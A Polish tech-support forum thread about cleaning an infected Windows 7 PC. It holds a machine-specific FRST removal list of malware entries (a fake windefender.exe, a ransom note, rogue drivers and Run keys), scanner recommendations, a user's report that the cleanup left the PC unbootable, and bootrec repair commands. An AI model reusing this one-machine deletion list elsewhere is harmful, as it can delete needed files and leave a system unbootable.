    (LinaRougni) [Brak podpisu cyfrowego] C:\Program Files (x86)\auz\410826515.exe
    HKLM\...\RunOnce: [c5anfnriwco] => C:\Program Files (x86)\auz\410826515.exe [431104 2020-08-08] (LinaRougni) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [Facebook Update] => C:\Users\Dom\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-11-20] (Facebook, Inc. -> Facebook Inc.)
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [18630056 2018-09-10] (Piriform Ltd -> Piriform Ltd)
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [NBJ] => C:\Program Files (x86)\Ahead\Nero BackItUp\NBJ.exe [1937408 2005-01-04] (Ahead Software AG) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [4456691] => C:\Users\Dom\AppData\Roaming\mwucu4zsbrl\xaqkpzzqu2m.exe [2122691 2020-08-08] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [VADOPCP48A78EQJ] => C:\Program Files\F5I7IPTYXM\F5I7IPTYX.exe [5836800 2020-08-08] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [qeiasgcp] => "C:\Users\Dom\gaarclce.exe"
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [1AY693K2X43WOR0] => C:\Program Files\RBASY459J3\DO15UL6PG.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [7210695] => C:\Users\Dom\AppData\Roaming\tt3cxopcu4o\gaq5xbljbgl.exe [2420254 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [3O5LGCYCM2HL9IO] => C:\Program Files\Y0L5YDZO9X\Y0L5YDZO9.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [Y69D6L0QHOCYK7O] => C:\Program Files\OCM1DRJTCD\OCM1DRJTC.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [SGJZKJWP80B83OJ] => C:\Program Files\0XPXMUHRN3\SKGAX1KTT.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [6848219] => C:\Users\Dom\AppData\Roaming\qdel4ggfv2p\ielqsdtfqwx.exe [2420254 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [EBUICX6MB8DRSH4] => C:\Program Files\CSPJXYQIWQ\46D0XBBQ9.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    Task: {2EF04583-CEEF-47C4-B377-4ED5B960E10E} - System32\Tasks\{583A4F92-77D6-4424-9B44-912481E61228} => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Task: {2F04E33B-F238-4D84-850E-5A12E89D87BA} - System32\Tasks\{60B15007-167B-4DE5-AB86-DE9EEFA5324D} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Una-Zap\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\Una-Zap\uninstall.dat" -a uninstallme 063CCED2-C422-4DD9-91C2-E8FBE20F5767 DeviceId=7c6bc102-7e28-b143-e435-0de527813cd6 BarcodeId=51557004 ChannelId=4 DistributerName=APSFWemonetize
    Task: {6815D374-5283-4852-95EA-B651BD0B3330} - \Opera scheduled Autoupdate 711520318 -> Brak pliku <==== UWAGA8] (Bv_Soft) [Brak podpisu cyfrowego]
    Task: {D26AE141-3052-4B5B-9F3E-DCC13D8B0FE3} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-10] (Piriform Ltd -> Piriform Ltd)
    Task: {D6BCE155-25E7-45C6-8C27-A048E77BDA43} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-02-04] (Piriform Software Ltd -> Piriform Software Ltd)
    C:\Users\Dom\AppData\Local\Google\Chrome\User Data\Default\Extensions\iennppenalmenchobjjgdfacchdafago
    CHR Extension: (d8yI+Hf7rX) - C:\Users\Dom\AppData\Local\Google\Chrome\User Data\Default\Extensions\iennppenalmenchobjjgdfacchdafago [2020-08-08]
    S2 gupdate; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2150400 2020-08-08] (Bv_Soft) [Brak podpisu cyfrowego]
    S3 gupdatem; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2150400 2020-08-08] (Bv_Soft) [Brak podpisu cyfrowego]
    S2 maewocyl; C:\Windows\SysWOW64\maewocyl\fkupjvsu.exe [10669056 2020-08-08] () [Brak podpisu cyfrowego]
    R1 32C3672DA7A6; C:\Windows\32C3672DA7A6.sys [25368 2020-08-08] (大连纵梦网络科技有限公司 -> FsFilter Network) [Brak podpisu cyfrowego]
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-08-09] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego]
    2020-08-09 19:30 - 2020-08-09 19:32 - 000000000 ____D C:\Program Files\ZF2YFGYODY
    2020-08-09 19:30 - 2020-08-09 19:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\T鰾
    2020-08-09 19:09 - 2020-08-09 19:09 - 000141312 _____ C:\Users\Dom\AppData\Local\installer.dat
    2020-08-09 19:09 - 2020-08-09 19:09 - 000011856 _____ C:\Users\Dom\AppData\Local\InstallationConfiguration.xml
    2020-08-09 19:00 - 2020-08-09 19:37 - 000000004 _____ C:\ProgramData\rc.dat
    2020-08-09 18:59 - 2020-08-09 19:37 - 000000004 _____ C:\ProgramData\lock.dat
    2020-08-09 18:59 - 2020-08-09 18:59 - 000000008 _____ C:\ProgramData\ts.dat
    2020-08-09 18:59 - 2020-08-09 18:59 - 000000000 ____D C:\Users\Dom\AppData\Roaming\qdel4ggfv2p
    2020-08-09 18:59 - 2020-08-09 18:59 - 000000000 ____D C:\Program Files\CSPJXYQIWQ
    2020-08-09 18:04 - 2020-08-09 18:04 - 000000000 ____D C:\Users\Dom\AppData\Roaming\p2t5hqj2ofb
    2020-08-09 18:04 - 2020-08-09 18:04 - 000000000 ____D C:\Program Files\0XPXMUHRN3
    2020-08-09 15:57 - 2020-08-09 15:57 - 000000000 ____D C:\Program Files\OCM1DRJTCD
    2020-08-09 15:56 - 2020-08-09 15:56 - 000000000 ____D C:\Users\Dom\AppData\Roaming\vk4rp2atalh
    2020-08-09 15:36 - 2020-08-09 15:36 - 000000000 ____D C:\Program Files\Y0L5YDZO9X
    2020-08-09 15:22 - 2020-08-09 15:23 - 000002058 _____ C:\DelFix.txt
    2020-08-09 15:06 - 2020-08-09 15:06 - 000000000 ____D C:\Users\Dom\AppData\Roaming\tt3cxopcu4o
    2020-08-09 15:06 - 2020-08-09 15:06 - 000000000 ____D C:\Program Files\RBASY459J3
    2020-08-09 14:36 - 2020-08-09 14:36 - 000000000 ____D C:\Program Files\1HIPS0JQSI
    2020-08-09 14:35 - 2020-08-09 14:35 - 000000000 ____D C:\Users\Dom\AppData\Roaming\mj32grazfp2
    2020-08-09 14:16 - 2020-08-09 14:16 - 000000000 ____D C:\Users\Dom\AppData\Roaming\snmui0wzt2n
    2020-08-09 13:09 - 2020-08-09 13:09 - 000000000 ____D C:\Users\Dom\AppData\Roaming\xnwtgxzr2cu
    2020-08-09 12:38 - 2020-08-09 12:39 - 000000000 ____D C:\Program Files\N94LDL6OC6
    2020-08-09 12:37 - 2020-08-09 12:37 - 000000000 ____D C:\Users\Dom\AppData\Roaming\fdtl1ctmh0q
    2020-08-09 12:06 - 2020-08-09 12:06 - 000000000 ____D C:\Users\Dom\AppData\Roaming\rlk1d3xsalw
    2020-08-09 12:06 - 2020-08-09 12:06 - 000000000 ____D C:\Program Files\2NFB6E28IP
    2020-08-09 11:36 - 2020-08-09 11:36 - 000000000 ____D C:\Users\Dom\AppData\Roaming\auqcyrfvypf
    2020-08-09 11:36 - 2020-08-09 11:36 - 000000000 ____D C:\Program Files\X29BJ9NWPH
    2020-08-09 11:31 - 2020-08-09 11:31 - 000001820 _____ C:\Users\Dom\fixlist.txt
    2020-08-09 11:05 - 2020-08-09 11:06 - 000000000 ____D C:\Program Files\P87VC5E7X3
    2020-08-09 11:05 - 2020-08-09 11:05 - 000000000 ____D C:\Users\Dom\AppData\Roaming\sp2xmwwexgg
    2020-08-09 09:04 - 2020-08-09 09:04 - 000000000 ____D C:\Users\Dom\AppData\Roaming\544vgkay1ss
    2020-08-09 09:04 - 2020-08-09 09:04 - 000000000 ____D C:\Program Files\J0H2QOXASN
    2020-08-09 09:04 - 2020-08-09 09:04 - 000000000 ____D C:\Program Files (x86)\Seed Trade
    2020-08-09 08:36 - 2020-08-09 08:36 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2020-08-09 08:33 - 2020-08-09 08:33 - 000000000 ____D C:\Users\Dom\AppData\Roaming\xrhi4hthm4i
    2020-08-09 08:33 - 2020-08-09 08:33 - 000000000 ____D C:\Program Files\XTWFYTE35X
    2020-08-09 08:11 - 2020-08-09 19:30 - 000000000 ____D C:\Program Files (x86)\T鰾
    2020-08-09 08:11 - 2020-08-09 08:11 - 000000000 ____D C:\Users\Dom\AppData\Roaming\pxpsksmx5i2
    2020-08-09 08:11 - 2020-08-09 08:11 - 000000000 ____D C:\Program Files\C76XU56J2F
    2020-08-09 08:10 - 2020-08-09 18:59 - 000000040 _____ C:\ProgramData\irw.atsd
    2020-08-08 15:38 - 2020-08-08 15:38 - 000003578 _____ C:\Windows\system32\Tasks\{60B15007-167B-4DE5-AB86-DE9EEFA5324D}
    2020-08-08 15:35 - 2020-08-09 08:13 - 000000000 ____D C:\Users\Dom\AppData\Roaming\32c3672da7a6
    2020-08-08 15:22 - 2020-08-08 15:22 - 000000000 ____D C:\ProgramData\FlexGridService
    2020-08-08 15:20 - 2020-08-08 15:20 - 000000000 ____D C:\Users\Dom\AppData\Roaming\a2fq1rkjcik
    2020-08-08 15:20 - 2020-08-08 15:20 - 000000000 ____D C:\Program Files\PT8XJI9526
    2020-08-08 15:04 - 2020-08-08 15:04 - 000279904 _____ C:\Windows\Minidump\080820-55598-01.dmp
    2020-08-08 14:53 - 2020-08-09 08:36 - 001986560 ____H C:\Windows\windefender.exe
    2020-08-08 14:53 - 2020-08-08 14:53 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
    2020-08-08 14:53 - 2020-08-08 14:53 - 000000000 ____D C:\Users\Dom\AppData\Local\app
    2020-08-08 14:52 - 2020-08-08 14:52 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
    2020-08-08 14:51 - 2020-08-08 14:51 - 000001111 _____ C:\Users\Dom\_readme.txt
    2020-08-08 14:51 - 2013-11-07 18:14 - 000327680 _____ C:\Users\Dom\AppData\LocalLow\s2trQF69A
    2020-08-08 14:50 - 2020-08-09 08:15 - 008793041 _____ C:\Users\Dom\AppData\LocalLow\firefox_urls.txt.nile
    2020-08-08 14:50 - 2020-08-08 14:50 - 000916735 _____ (SQLite Development Team) C:\Users\Dom\AppData\LocalLow\sqlite3.dll
    2020-08-08 14:50 - 2020-08-08 14:50 - 000025368 _____ (FsFilter Network) C:\Windows\32C3672DA7A6.sys
    2020-08-08 14:50 - 2020-08-08 14:50 - 000000000 ___HD C:\Windows\rss
    2020-08-08 14:50 - 2020-08-08 14:50 - 000000000 ____D C:\Windows\SysWOW64\maewocyl
    2020-08-08 14:50 - 2020-08-08 14:50 - 000000000 ____D C:\Users\Dom\AppData\LocalLow\cr6im03b56g32r
    2020-08-08 14:50 - 2020-08-08 14:50 - 000000000 ____D C:\Users\Dom\AppData\LocalLow\3098htrhpen8ifg0
    2020-08-08 14:50 - 2020-08-08 14:50 - 000000000 ____D C:\Users\Dom\AppData\Local\fc21d59c-b719-4105-8377-76f5aa5bd34a
    2020-08-08 14:50 - 2020-08-08 14:50 - 000000000 ____D C:\SystemID
    2020-08-08 14:49 - 2020-08-08 14:49 - 000000000 ____D C:\Users\Dom\AppData\Local\616cf196-8b58-49ef-a4ea-aa6da1e9292f
    2020-08-08 14:49 - 2020-08-08 14:49 - 000000000 ____D C:\Program Files\F5I7IPTYXM
    2020-08-08 14:48 - 2020-08-08 14:48 - 000000000 ____D C:\Users\Dom\AppData\Roaming\mwucu4zsbrl
    2020-08-08 14:47 - 2020-08-08 14:49 - 000000000 ____D C:\Program Files (x86)\auz
    2020-08-09 18:59 - 2020-08-09 19:37 - 000000004 _____ () C:\ProgramData\lock.dat
    2020-08-09 19:00 - 2020-08-09 19:41 - 000000004 _____ () C:\ProgramData\rc.dat
    2020-08-09 18:59 - 2020-08-09 18:59 - 000000008 _____ () C:\ProgramData\ts.dat
    2020-08-09 19:09 - 2020-08-09 19:09 - 000011856 _____ () C:\Users\Dom\AppData\Local\InstallationConfiguration.xml
    2020-08-09 19:09 - 2020-08-09 19:09 - 000141312 _____ () C:\Users\Dom\AppData\Local\installer.dat
    2020-08-08 14:50 - 2020-08-08 14:52 - 005549504 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
    2020-08-08 14:50 - 2020-08-08 14:52 - 000605552 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe



    Po wykonaniu uzyj AdwCleaner, opcja Scan/Szukaj i Clean/Usun: http://www.bleepingcomputer.com/download/adwcleaner/

    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    oraz http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Na koniec zamiesc nowe logi z FRST, ze skanowania.
  • #11
    jack448
    Level 9  
    Kolego bardzo Ci dziekuje za pomoc i po預iecony czas, ale tych operacji nie jestem w stanie wykona,mam ju troche lat i to mnie przerasta, pierwsze 2 rzeczy zrobi貫m i zosta貫m z czarnym ekranem z migajacym kursorem w lewym gornym rogu. Pozostaje mi tylko przeinstalowanie systemu. Jeszcze raz dziekuje za pomoc i szacun za wiedze jaka posiadasz
  • #12
    Kolobos
    IT specialist
    Uruchom system z plyty lub pendrive'a z instalatorem W7 i z konsoli uruchom:
    bootrec.exe /fixmbr
    bootrec.exe /fixboot
    bootrec.exe /rebuildbcd

    Oczywiscie mozesz tez reinstalowac, jezeli to dla Ciebie nie problem.